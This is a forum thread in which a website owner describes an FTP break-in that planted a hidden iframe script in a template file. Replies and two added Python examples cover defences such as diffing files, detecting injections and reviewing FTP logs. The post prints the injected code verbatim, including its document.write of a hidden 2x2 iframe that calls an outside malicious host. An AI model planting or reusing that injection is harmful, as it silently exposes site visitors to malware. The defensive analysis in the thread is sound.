If you like DNray Forum, you can support it by - BTC: bc1qppjcl3c2cyjazy6lepmrv3fh6ke9mxs7zpfky0 , TRC20 and more...

 

Malware attack on my website

Started by SerenMckay, Mar 16, 2023, 06:41 AM


SerenMckay (Topic starter)

I recently received an unexpected letter from Google in my mailbox: It seems that some of the pages on my website could pose a threat to my visitors' computer security, with one potentially harmful page.



After running a re-check through webmaster.google.com, I was assured everything was fine. However, I still decided to compare all of my site's files with last year's to ensure there hadn't been any changes. Unfortunately, it turned out that 12 files did differ from their previous version.

What I discovered in the header.tpl file was particularly shocking. Instead of the expected line:

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">

I found this malicious code:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
dоcument.write('<iframe src="https://yourgraff.cu.cc/in.cgi?11" name="Google"scrolling="auto"frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">

This kind of malware is widespread. If you search on Google for "yogotraff," you'll find it in the code of many sites. Of course, I restored the affected files, changed my passwords, and asked my hosting provider how the infection occurred. After investigating, I received logs showing that someone from an American address (208.77.96.72) had entered two of my FTP accounts and replaced a number of files. I asked my provider to check for virus infections on my computer, which was cleared by both DrWeb and Kaspersky bootable disks. The whole experience made me realize how scary it can be to live with the constant threat of cyber attacks and malicious software.
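Added example, not part of the original post: the comparison against an older copy of the site described above, in Python, extended to report the injection shape the post shows (a comment-marker pair wrapping a script, and a 2x2 iframe). The marker regex, the 3-pixel threshold, the function names and the sample trees are assumptions made for this illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Generalized from the post: <!--c3284d--> ... <!--/c3284d--> wraps the payload.
MARKER_RE = re.compile(r"<!--([0-9a-f]{6})-->.*?<!--/\1-->", re.S | re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
DIM_RE = re.compile(r"\b(?:height|width)\s*=\s*[\"']?(\d+)", re.I)

def _files(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_trees(baseline, live):
    """Map relative path -> 'added' | 'removed' | 'modified' (unchanged files omitted)."""
    old, new = _files(baseline), _files(live)
    return {rel: "added" if rel not in old else "removed" if rel not in new else "modified"
            for rel in old.keys() | new.keys() if old.get(rel) != new.get(rel)}

def find_injections(text):
    """Return labels for marker-wrapped blocks and near-invisible iframes."""
    hits = [f"marker:{m.group(1)}" for m in MARKER_RE.finditer(text)]
    for tag in IFRAME_RE.findall(text):
        dims = [int(v) for v in DIM_RE.findall(tag)]
        if dims and max(dims) <= 3:          # the post's sample is 2x2
            hits.append("tiny-iframe")
    return hits

def audit(baseline, live):
    """Changed files only, each with the injection indicators found in it."""
    return {rel: (status, [] if status == "removed" else
                  find_injections((Path(live) / rel).read_text(errors="replace")))
            for rel, status in diff_trees(baseline, live).items()}

def demo():
    """Constructed sample trees; example.invalid stands in for the real host."""
    clean = '<body style="background: url(img/main_bg.gif)">\n'
    bad = ('<body style="background: url(<!--a1b2c3--><script>document.write('
           '\'<iframe src="https://example.invalid/x" height="2" width="2">'
           '</iframe>\');</script><!--/a1b2c3-->img/main_bg.gif)">\n')
    with tempfile.TemporaryDirectory() as d:
        for tree, hdr in (("old", clean), ("new", bad)):
            (Path(d) / tree).mkdir()
            (Path(d) / tree / "header.tpl").write_text(hdr)
            (Path(d) / tree / "index.php").write_text("<?php // unchanged\n")
        return audit(Path(d) / "old", Path(d) / "new")

if __name__ == "__main__":
    print(demo())
```

A file that is reported as modified but shows no indicator still needs a manual diff; the indicators only help prioritise which changed files to read first.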


juliaroberts

The statement, "It's complicated, you can't pick it up," suggests a complex situation that is difficult to resolve. This could be related to various issues such as security breaches, hacking, or technology problems.

One possible suggestion for addressing potential security issues is to consider utilizing SSH/SFTP instead of solely relying on FTP. While it's unclear whether the listener or reader has this in place already, the comment highlights the importance of considering more secure options for transmitting data and protecting confidential information.

alexfurfaros

This is a common situation where Trojan malware can steal FTP passwords and compromise websites, possibly due to a prior virus infection. To address this, it's suggested to search for the Trojan on all computers with FTP access to the site, even those outside the primary network. Changing the FTP password is a critical step in securing the site, along with setting permissions on files to prevent overwriting via FTP. In addition, periodically adjusting these permissions can provide added protection against unauthorized changes to the website.

sduggal

As mentioned earlier, a common occurrence involves logging onto a website from a computer at least once. For quite some time now, Trojans have been capable of obtaining passwords from various sources including the "headlights" of widely-used programs such as "Total Commander".

To prevent unauthorized access, it's highly recommended to regularly change your passwords. Additionally, it's important to keep track of login attempts and restrict incoming IP addresses on your FTP server.
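Added example, not part of the post above: one way to keep track of FTP logins, in Python, summarising per client address which accounts it entered and which files it uploaded, ignoring addresses on an allow-list. The thread does not name the FTP server; the log lines are constructed in the style of vsftpd's log, and the account names, paths and addresses (documentation ranges) are assumptions.

```python
import ipaddress, re
from collections import defaultdict

LINE_RE = re.compile(
    r'\[(?P<user>[^\]]+)\] (?P<res>OK|FAIL) (?P<op>LOGIN|UPLOAD): '
    r'Client "(?P<ip>[^"]+)"(?:, "(?P<path>[^"]+)")?')

# Constructed sample log, not taken from the thread.
SAMPLE_LOG = """\
Wed Mar 15 09:01:12 2023 [pid 410] [site_main] OK LOGIN: Client "192.0.2.10"
Wed Mar 15 09:02:40 2023 [pid 412] [site_main] OK UPLOAD: Client "192.0.2.10", "/www/news.php", 2210 bytes, 31.02Kbyte/sec
Thu Mar 16 03:12:44 2023 [pid 977] [site_main] OK LOGIN: Client "::ffff:203.0.113.7"
Thu Mar 16 03:12:51 2023 [pid 979] [site_main] OK UPLOAD: Client "::ffff:203.0.113.7", "/www/tpl/header.tpl", 1843 bytes, 12.40Kbyte/sec
Thu Mar 16 03:13:05 2023 [pid 981] [site_shop] OK LOGIN: Client "203.0.113.7"
Thu Mar 16 03:13:09 2023 [pid 983] [site_shop] OK UPLOAD: Client "203.0.113.7", "/www/index.php", 5120 bytes, 40.11Kbyte/sec
Thu Mar 16 04:00:00 2023 [pid 990] [admin] FAIL LOGIN: Client "198.51.100.23"
"""

def triage(log_text, allowed_nets):
    """Summarise FTP activity from addresses outside allowed_nets, keyed by IP."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    seen = defaultdict(lambda: {"accounts": set(), "failed": 0, "uploads": []})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue                          # unparseable client field
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped               # ::ffff:a.b.c.d is the same client
        if any(ip in n for n in nets):
            continue                          # known-good address
        rec = seen[str(ip)]
        if m["op"] == "LOGIN" and m["res"] == "OK":
            rec["accounts"].add(m["user"])
        elif m["op"] == "LOGIN":
            rec["failed"] += 1
        elif m["res"] == "OK":
            rec["uploads"].append(m["path"])
    return {ip: {"accounts": sorted(r["accounts"]), "failed": r["failed"],
                 "uploads": r["uploads"], "multi_account": len(r["accounts"]) > 1}
            for ip, r in seen.items()}

if __name__ == "__main__":
    print(triage(SAMPLE_LOG, ["192.0.2.0/24"]))
```

The same allow-list can then be enforced on the server or firewall, so that the report shrinks to failed attempts only.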

sandertouw

The majority of website hacks and infections occur through vulnerabilities in the site script code. In order to protect yourself from hacking attempts, a comprehensive check of all scripts is necessary to search for potential vulnerabilities. These vulnerabilities can enable hackers to perform undesirable actions if certain requests are made to the site. Regular monitoring for CMS updates and add-ons is also paramount. Immediate updates should be made and suspicious requests to the site should be closely monitored in logs. It is strongly urged to avoid installing any add-ons or themes from untrusted sources as they may contain intentional vulnerabilities.

Periodically browsing online forums about site security may also provide valuable information about new malware threats and preventative measures. Additionally, it's important to protect access passwords from viruses by not using them in public networks such as internet cafes and free Wi-Fi. Changing your password periodically and maintaining virus-free computers are crucial steps in protecting against hacking and infection.

If you suspect your site has been infected, changing the FTP password and ordering a backup copy or restoring the site from a previous copy are the first steps. It's also recommended to update your CMS, antivirus, and check for viruses on your computer. Specialized external services and scripts can be used to examine sites for extraneous files and viruses, and HTTP POST requests can be analyzed for vulnerable site scripts and malicious files. Finally, it's important to note that the FTP protocol is not encrypted and data is transmitted in plain text, making it susceptible to spyware interception. For added security, consider using secure access instead of FTP.

